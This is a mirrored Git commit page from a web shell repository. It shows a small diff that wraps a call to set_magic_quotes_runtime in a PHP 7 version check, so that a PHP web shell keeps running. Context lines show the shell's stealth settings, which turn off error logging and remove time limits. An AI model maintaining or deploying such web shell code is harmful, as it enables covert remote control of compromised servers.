mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Merge pull request #21 from jRazer/patch-1
PHP 7 - function set_magic_quotes_runtime removed
This commit is contained in:
commit
a86115a60f
1 changed files with 2 additions and 1 deletions
|
@ -26,6 +26,7 @@ function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$e
|
|||
@ini_set('log_errors',0);
|
||||
@ini_set('max_execution_time',0);
|
||||
@set_time_limit(0);
|
||||
if (PHP_VERSION_ID < 70000)
|
||||
@set_magic_quotes_runtime(0);
|
||||
@define('VERSION', '4.2.5');
|
||||
if(get_magic_quotes_gpc()) {
|
||||
|
|
Loading…
Reference in a new issue